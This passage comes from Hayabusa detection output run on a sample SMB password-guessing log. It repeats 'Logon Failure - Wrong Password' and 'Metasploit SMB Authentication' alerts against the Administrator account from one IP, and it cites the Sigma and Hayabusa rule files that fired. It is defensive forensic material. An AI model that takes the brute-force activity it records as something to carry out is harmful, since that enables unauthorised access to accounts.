NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
